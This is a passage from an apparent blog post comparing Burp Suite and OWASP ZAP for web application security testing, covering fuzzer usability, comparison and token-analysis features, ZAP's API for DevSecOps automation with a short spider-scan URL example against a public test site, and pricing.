  • Diff-like capability or comparison feature (Burp only AFAIK no support out of the box for ZAP).
  • Support for multiple programming and scripting languages.
  • Authentication Modules like NTLM, form authentication, and so on.

I might have missed some features so please if you know a feature I missed, please comment below.

3. User experience

A while back, I had to use both tools for a comparison. While I am more used to Burp Suite, at first look OWASP ZAP does the same things but has to be enhanced with plugins. Keep in mind there is an easy learning curve for both.
For example, ZAP has a single fuzzer window, which makes it harder to search fuzzer results, especially when you run multiple fuzzers, while Burp has a separate window and configuration for each fuzz conducted; the same goes for other features.
Unlike Burp, you can't change (add, edit, or remove) HTTP headers in the ZAP fuzzer window. That gives Burp an edge, because it allows you to sort and search fuzzing results faster and more effectively.

zap fuzzer
Zap 2.8.0 Fuzzer window
burp fuzzer configuratability
Burp 2020.2.1 Fuzzer window

which one do you find intuitive?

One big plus for Burp is the Comparer tab; it allows for easier change detection, like spotting differences in size from time changes, tokens, and content. ZAP lacks this feature without extensions (comment below which ZAP plugin does that).

quickly compare request or response

Another hurdle in ZAP is searching for text in the request or server response; Burp makes this more accessible, letting you search for plain text or a regex.

Burp Repeater makes it easier to search
Zap request Editor

One more thing that makes Burp more popular than ZAP is the ability to assess token entropy and randomness for cryptographic analysis. Very useful when session cookies are generated manually.

Burp Sequencer run statistics on tokens and calculates Entropy

However, one big plus for ZAP is its API, which makes for easier integration and automation than Burp. You can access the API from the browser, from other user agents like curl, or via SDKs/libraries.

The Burp Suite community edition API can only be used to write plugins and extensions, unlike ZAP's, which can be used in DevOps and/or DevSecOps pipelines.

A new Burp REST API was introduced in 2018, which makes it easier to integrate Burp with other tools and workflows.

An example is using the API to spider a host and getting the results, e.g. crawling testphp.vulnweb.com from the console.
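Sketched as a script, kicking off a spider scan via ZAP's JSON API looks roughly like this (a local ZAP daemon on port 8080 and a placeholder API key are assumed; the endpoint paths follow the ZAP API documentation):

```javascript
// Build the ZAP spider-scan request URL; the apikey value is a placeholder
const zap = 'http://localhost:8080';
const apikey = 'changeme';
const target = 'http://testphp.vulnweb.com';
const scanUrl = zap + '/JSON/spider/action/scan/?apikey=' + apikey +
                '&url=' + encodeURIComponent(target);
console.log(scanUrl);
// With a running daemon you would then do:
// fetch(scanUrl).then(r => r.json()).then(o => console.log('scan id', o.scan));
// Progress: GET /JSON/spider/view/status/?scanId=<id>
// Results:  GET /JSON/spider/view/results/?scanId=<id>
```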

This feature makes OWASP ZAP the easiest to integrate into DevSecOps pipelines no matter how big or small is your environment.

ZAP API in action

For a while, only OWASP had good resources to learn about ZAP and web application security, but recently PortSwigger also launched a very good free Web Security Academy.

4. Pros and Cons of each tool

In my experience, ZAP is good when it comes to DevOps/DevSecOps for its easier API integration and support, while Burp is more oriented towards actual vulnerability assessment and penetration testing of web applications.

At the different price points for each tool, it is up to your scenario to decide if more expensive is better. Burp Pro is priced by PortSwigger at 399 USD per user per year, While OWASP ZAP is a free and open-source project under Apache 2.0 License.

In conclusion, both tools are good in their differences and use cases. Tell me which tool you like, and your tips and tricks for ZAP or Burp (●'◡'●)